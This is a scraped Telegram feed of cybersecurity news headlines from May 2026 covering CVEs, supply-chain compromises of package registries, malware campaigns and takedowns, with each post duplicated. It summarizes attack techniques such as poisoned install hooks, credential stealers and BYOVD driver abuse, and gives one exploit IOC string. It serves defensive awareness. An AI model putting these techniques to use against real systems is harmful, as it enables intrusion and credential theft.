β‘ Not via a fancy zero-day... #GitHub confirmed its internal repositories were breached after an employee device installed a poisoned Nx Console VS Code extension.
https://thehackernews.com/2026/05/github-internal-repositories-breached.html
TeamPCP exfiltrated ~3,800 repos in an 18-minute window.
The extension deployed a credential stealer targeting 1Password, GitHub tokens, AWS, and more via auto-updates.
https://thehackernews.com/2026/05/github-internal-repositories-breached.html
TeamPCP exfiltrated ~3,800 repos in an 18-minute window.
The extension deployed a credential stealer targeting 1Password, GitHub tokens, AWS, and more via auto-updates.
π₯17π6π1
This media is not supported in your browser
VIEW IN TELEGRAM
π [New] 9-Year-Old Linux Kernel Bug = Local Root on Default Debian, Ubuntu & Fedora.
https://thehackernews.com/2026/05/9-year-old-linux-kernel-flaw-enables.html
CVE-2026-46333 (ssh-keysign-pwn) lets any unprivileged user steal /etc/shadow + SSH host keys and run commands as root.
πΈ Public PoC available
πΈ Patch your kernel NOW
πΈ Quick temp fix - sysctl kernel.yama.ptrace_scope=2
https://thehackernews.com/2026/05/9-year-old-linux-kernel-flaw-enables.html
CVE-2026-46333 (ssh-keysign-pwn) lets any unprivileged user steal /etc/shadow + SSH host keys and run commands as root.
πΈ Public PoC available
πΈ Patch your kernel NOW
πΈ Quick temp fix - sysctl kernel.yama.ptrace_scope=2
π₯18π€7β‘4π3π3π3π±3
π¨ Microsoft warns two Defender vulnerabilities are being actively exploited in the wild.
https://thehackernews.com/2026/05/microsoft-warns-of-two-actively.html
πΈ CVE-2026-41091 could allow attackers to gain SYSTEM privileges locally.
πΈ CVE-2026-45498 is a denial-of-service flaw impacting Defender.
CISA added both to KEV with a June 3, 2026 patch deadline.
https://thehackernews.com/2026/05/microsoft-warns-of-two-actively.html
πΈ CVE-2026-41091 could allow attackers to gain SYSTEM privileges locally.
πΈ CVE-2026-45498 is a denial-of-service flaw impacting Defender.
CISA added both to KEV with a June 3, 2026 patch deadline.
π7π₯5π3
π¨ ThreatsDay Bulletin β May 21, 2026 is LIVE!
π₯ 47 zero-days
π€ AI agents gone rogue
π§ Old Linux rootkit still alive
...and 25 more fresh threats
Attackers are weaponizing the tools we trust.
Read full bulletin: https://thehackernews.com/2026/05/threatsday-bulletin-linux-rootkits.html
π₯ 47 zero-days
π€ AI agents gone rogue
π§ Old Linux rootkit still alive
...and 25 more fresh threats
Attackers are weaponizing the tools we trust.
Read full bulletin: https://thehackernews.com/2026/05/threatsday-bulletin-linux-rootkits.html
π8
π€οΈ A single cached AWS key β auto-stored after a normal login on one Windows machine. No misconfig. No policy violation.
Yet it could open a path to 98% of the companyβs cloud entities.
Identity isnβt the perimeter. Itβs the highway attackers use once inside.
Must-read: https://thehackernews.com/2026/05/when-identity-is-attack-path.html
Yet it could open a path to 98% of the companyβs cloud entities.
Identity isnβt the perimeter. Itβs the highway attackers use once inside.
Must-read: https://thehackernews.com/2026/05/when-identity-is-attack-path.html
π5
π₯ Limited special offers
15K SOC teams and 600K security professionals worldwide trust ANY.RUNβs enterprise-grade threat analysis and intelligence to close critical malware & phishing gaps and cut MTTR.
Get your offer today β‘οΈ https://thn.news/anyrun-tg-plan-offer
15K SOC teams and 600K security professionals worldwide trust ANY.RUNβs enterprise-grade threat analysis and intelligence to close critical malware & phishing gaps and cut MTTR.
Get your offer today β‘οΈ https://thn.news/anyrun-tg-plan-offer
π₯5π4π€1
π¨ Showboat #Linux malware targets Middle East telecom.
https://thehackernews.com/2026/05/showboat-linux-malware-hits-middle-east.html
Active since at least mid-2022, the modular framework enables remote shells, file transfers, process hiding, and SOCKS5 proxying to access internal LAN systems.
https://thehackernews.com/2026/05/showboat-linux-malware-hits-middle-east.html
Active since at least mid-2022, the modular framework enables remote shells, file transfers, process hiding, and SOCKS5 proxying to access internal LAN systems.
π9π4π±4β‘1π₯1
π¨ Critical Alert: Cisco Secure Workload Hit with CVSS 10.0 Flaw.
https://thehackernews.com/2026/05/cisco-patches-cvss-100-secure-workload.html
Unauthenticated attackers can exploit a REST API vulnerability (CVE-2026-20223) to steal sensitive data and make configuration changes across tenant boundaries with Site Admin privileges.
Affects both SaaS and on-prem deployments. No workarounds.
Patch immediately:
β’ 3.10 β 3.10.8.3
β’ 4.0 β 4.0.3.17
β’ 3.9 or older β Migrate now
https://thehackernews.com/2026/05/cisco-patches-cvss-100-secure-workload.html
Unauthenticated attackers can exploit a REST API vulnerability (CVE-2026-20223) to steal sensitive data and make configuration changes across tenant boundaries with Site Admin privileges.
Affects both SaaS and on-prem deployments. No workarounds.
Patch immediately:
β’ 3.10 β 3.10.8.3
β’ 4.0 β 4.0.3.17
β’ 3.9 or older β Migrate now
π4π₯4β‘3
π¨ CISA just added two actively exploited vulns to its KEV catalog.
https://thehackernews.com/2026/05/cisa-adds-exploited-langflow-and-trend.html
Critical RCE in Langflow (CVE-2025-34291, CVSS 9.4) and directory traversal in Trend Micro Apex One (on-prem).
Patch now if you're using either.
https://thehackernews.com/2026/05/cisa-adds-exploited-langflow-and-trend.html
Critical RCE in Langflow (CVE-2025-34291, CVSS 9.4) and directory traversal in Trend Micro Apex One (on-prem).
Patch now if you're using either.
π₯4β‘3π3
A 23-year-old Canadian man has been arrested over the alleged operation of Kimwolf, a #DDoS botnet that infected photo frames, webcams, and other devices.
The botnet issued 25,000+ attack commands and peaked at 31.4 Tbps.
Full story π https://thehackernews.com/2026/05/kimwolf-ddos-botnet-operator-arrested.html
The botnet issued 25,000+ attack commands and peaked at 31.4 Tbps.
Full story π https://thehackernews.com/2026/05/kimwolf-ddos-botnet-operator-arrested.html
π9π6π4π€―2
Many vulnerable Windows drivers were considered 'safe' because their code only runs with matching hardware.
New research shows you can often trigger them from user mode alone β no hardware needed.
This makes far more drivers practical for BYOVD attacks (e.g. killing EDRs).
Details β https://thehackernews.com/2026/05/making-vulnerable-drivers-exploitable.html
New research shows you can often trigger them from user mode alone β no hardware needed.
This makes far more drivers practical for BYOVD attacks (e.g. killing EDRs).
Details β https://thehackernews.com/2026/05/making-vulnerable-drivers-exploitable.html
π₯10π4π3
β‘ Megalodon pushed malicious CI/CD workflows to 5,561 #GitHub repos in 6 hours.
https://thehackernews.com/2026/05/megalodon-github-attack-targets-5561.html
Attackers used throwaway accounts and forged CI bot names to inject GitHub Actions payloads designed to steal CI secrets, cloud credentials, SSH keys, OIDC tokens, and source code secrets.
Check recent workflow changes, audit PATs/deploy keys, and review unexpected CI bot commits.
https://thehackernews.com/2026/05/megalodon-github-attack-targets-5561.html
Attackers used throwaway accounts and forged CI bot names to inject GitHub Actions payloads designed to steal CI secrets, cloud credentials, SSH keys, OIDC tokens, and source code secrets.
Check recent workflow changes, audit PATs/deploy keys, and review unexpected CI bot commits.
π6π₯5β‘3
Ghostwriter is phishing Ukraineβs government with Prometheus-themed malware lures.
https://thehackernews.com/2026/05/ghostwriter-targets-ukraine-government.html
Compromised-account emails deliver PDF links that lead to ZIP-based JavaScript malware: OYSTERFRESH β OYSTERBLUES/OYSTERSHUCK.
Cobalt Strike is assessed as the final payload.
https://thehackernews.com/2026/05/ghostwriter-targets-ukraine-government.html
Compromised-account emails deliver PDF links that lead to ZIP-based JavaScript malware: OYSTERFRESH β OYSTERBLUES/OYSTERSHUCK.
Cobalt Strike is assessed as the final payload.
π₯18π±4π3π€―2
π¨ First VPN, a criminal VPN used by at least 25 ransomware groups, has been dismantled.
https://thehackernews.com/2026/05/first-vpn-dismantled-in-global-takedown.html
Authorities say the service helped criminals hide the origin of ransomware attacks, data theft, scanning, fraud, and DDoS activity.
The May 19β20 operation seized 33 servers and domains, including 1vpns[.]com, 1vpns[.]net, and 1vpns[.]org.
https://thehackernews.com/2026/05/first-vpn-dismantled-in-global-takedown.html
Authorities say the service helped criminals hide the origin of ransomware attacks, data theft, scanning, fraud, and DDoS activity.
The May 19β20 operation seized 33 servers and domains, including 1vpns[.]com, 1vpns[.]net, and 1vpns[.]org.
π₯19π€―10π6π4
π¨ Drupal Core SQL injection is now actively exploited.
https://thehackernews.com/2026/05/drupal-core-sql-injection-bug-actively.html
CISA added CVE-2026-9082 to its KEV catalog after exploitation was detected in the wild.
Imperva observed:
β’ 15,000+ attack attempts
β’ Nearly 6,000 targeted sites
β’ Activity across 65 countries
β’ Gaming and financial services sites hit hardest, at nearly 50% of attacks
The flaw affects all supported Drupal Core versions and could allow privilege escalation and remote code execution via specially crafted requests.
Patch now:
β’ Drupal 11.3.10, 11.2.12, 11.1.10, 10.6.9, 10.5.10, 10.4.10.
β’ Drupal 9.5 and 8.9 require manual patching.
https://thehackernews.com/2026/05/drupal-core-sql-injection-bug-actively.html
CISA added CVE-2026-9082 to its KEV catalog after exploitation was detected in the wild.
Imperva observed:
β’ 15,000+ attack attempts
β’ Nearly 6,000 targeted sites
β’ Activity across 65 countries
β’ Gaming and financial services sites hit hardest, at nearly 50% of attacks
The flaw affects all supported Drupal Core versions and could allow privilege escalation and remote code execution via specially crafted requests.
Patch now:
β’ Drupal 11.3.10, 11.2.12, 11.1.10, 10.6.9, 10.5.10, 10.4.10.
β’ Drupal 9.5 and 8.9 require manual patching.
π₯8π€―3π2π1
π¨ Active exploit: LiteSpeed cPanel root flaw.
https://thehackernews.com/2026/05/litespeed-cpanel-plugin-cve-2026-48172.html
CVE-2026-48172 is a CVSS 10.0 vulnerability in LiteSpeed User-End cPanel Plugin that lets any cPanel user run arbitrary scripts as root.
πΈ Affected: v2.3β2.4.4
πΈ Not affected: WHM plugin
πΈ Fix: upgrade to WHM Plugin 5.3.1.0 with cPanel plugin v2.4.7+
πΈ IOC: cpanel_jsonapi_func=redisAble
https://thehackernews.com/2026/05/litespeed-cpanel-plugin-cve-2026-48172.html
CVE-2026-48172 is a CVSS 10.0 vulnerability in LiteSpeed User-End cPanel Plugin that lets any cPanel user run arbitrary scripts as root.
πΈ Affected: v2.3β2.4.4
πΈ Not affected: WHM plugin
πΈ Fix: upgrade to WHM Plugin 5.3.1.0 with cPanel plugin v2.4.7+
πΈ IOC: cpanel_jsonapi_func=redisAble
π₯8π6π4
π Supply Chain Attack Alert: 700+ Laravel-Lang package versions compromised.
https://thehackernews.com/2026/05/laravel-lang-php-packages-compromised.html
The malicious code auto-runs via Composer, drops a cross-platform PHP stealer, and targets cloud keys, CI/CD tokens, browser data, crypto wallets, password managers, SSH keys, and .env files.
Laravel/PHP devs: check your composer.lock immediately.
https://thehackernews.com/2026/05/laravel-lang-php-packages-compromised.html
The malicious code auto-runs via Composer, drops a cross-platform PHP stealer, and targets cloud keys, CI/CD tokens, browser data, crypto wallets, password managers, SSH keys, and .env files.
Laravel/PHP devs: check your composer.lock immediately.
π₯6β‘4π2
π¨ Anthropicβs Claude Mythos Preview found 10,000+ severe software flaws in one month.
https://thehackernews.com/2026/05/claude-mythos-ai-finds-10000-high.html
The AI uncovered high- or critical-severity vulnerabilities across widely used software, including 1,726 confirmed flaws and 1,094 rated high or critical severity.
The findings have already led to 97 patches and 88 advisories.
One flaw, CVE-2026-5194 in WolfSSL, could allow certificate forgery.
https://thehackernews.com/2026/05/claude-mythos-ai-finds-10000-high.html
The AI uncovered high- or critical-severity vulnerabilities across widely used software, including 1,726 confirmed flaws and 1,094 rated high or critical severity.
The findings have already led to 97 patches and 88 advisories.
One flaw, CVE-2026-5194 in WolfSSL, could allow certificate forgery.
π₯28π€9π7β‘5π±5π4π3
β οΈ Supply chain attack hits Packagist.
https://thehackernews.com/2026/05/packagist-supply-chain-attack-infects-8.html
8 packages were compromised with malicious package.json postinstall scripts that downloaded and executed a Linux binary from GitHub Releases.
The payload was also linked to 777 GitHub files, including GitHub Actions workflow files.
Audit your dependencies and lockfiles.
https://thehackernews.com/2026/05/packagist-supply-chain-attack-infects-8.html
8 packages were compromised with malicious package.json postinstall scripts that downloaded and executed a Linux binary from GitHub Releases.
The payload was also linked to 777 GitHub files, including GitHub Actions workflow files.
Audit your dependencies and lockfiles.
π₯11π3
π₯ npm now requires human 2FA approval before staged package releases become installable β even from CI/CD workflows.
https://thehackernews.com/2026/05/npm-adds-2fa-gated-publishing-and.html
New package versions uploaded with staged publishing are placed into a queue and must be explicitly approved by a maintainer before release.
Requirements:
β’ npm CLI 11.15.0+
β’ 2FA enabled
β’ Existing npm package
β’ Use npm stage publish
npm also added new install controls:
--allow-file
--allow-remote
--allow-directory
The updates are designed to strengthen defenses against software supply chain attacks targeting open-source ecosystems.
https://thehackernews.com/2026/05/npm-adds-2fa-gated-publishing-and.html
New package versions uploaded with staged publishing are placed into a queue and must be explicitly approved by a maintainer before release.
Requirements:
β’ npm CLI 11.15.0+
β’ 2FA enabled
β’ Existing npm package
β’ Use npm stage publish
npm also added new install controls:
--allow-file
--allow-remote
--allow-directory
The updates are designed to strengthen defenses against software supply chain attacks targeting open-source ecosystems.
π36π16π€6π₯2
π¨ TrapDoor supply chain attack hits npm, PyPI, and Crates-io.
https://thehackernews.com/2026/05/trapdoor-supply-chain-attack-spreads.html
34 malicious packages across 384 versions were used to steal crypto wallets, SSH keys, cloud credentials, and developer secrets from crypto, DeFi, Solana, and AI environments.
The malware abused npm hooks, Python imports, and Rust build scripts for execution and persistence.
https://thehackernews.com/2026/05/trapdoor-supply-chain-attack-spreads.html
34 malicious packages across 384 versions were used to steal crypto wallets, SSH keys, cloud credentials, and developer secrets from crypto, DeFi, Solana, and AI environments.
The malware abused npm hooks, Python imports, and Rust build scripts for execution and persistence.
π±13π₯4β‘3π1π€―1